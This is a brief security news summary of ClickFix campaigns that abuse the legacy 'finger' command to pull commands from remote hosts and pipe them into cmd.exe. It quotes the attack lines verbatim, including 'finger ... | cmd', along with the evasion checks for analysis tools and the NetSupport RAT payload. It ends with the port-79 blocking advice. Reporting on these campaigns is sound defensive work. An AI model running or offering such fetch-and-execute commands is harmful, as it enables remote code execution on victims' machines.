Threat actors have resurrected the decades-old “finger” command to enable remote command execution in new ClickFix malware attacks. A batch file was identified exploiting the “finger root@finger.nateams[.]com” command to retrieve and execute commands via cmd.exe. Further investigation uncovered a ClickFix campaign using the “finger Kove2@api.metrics-strange.com | cmd” command, similar to another reported campaign. This intrusion was more sophisticated, targeting malware research tools like WinDump, filemon, Procmon, x64dbg, vmmap, processlasso, Fiddler, and Everywhere. If no malware analysis tools are found, a PDF-spoofing ZIP archive is loaded, extracting the NetSupport Manager RAT package. To counteract this exploitation, blocking outgoing traffic to TCP port 79 is essential.
Are threat actors reviving the ‘finger’ command for new ClickFix attacks?
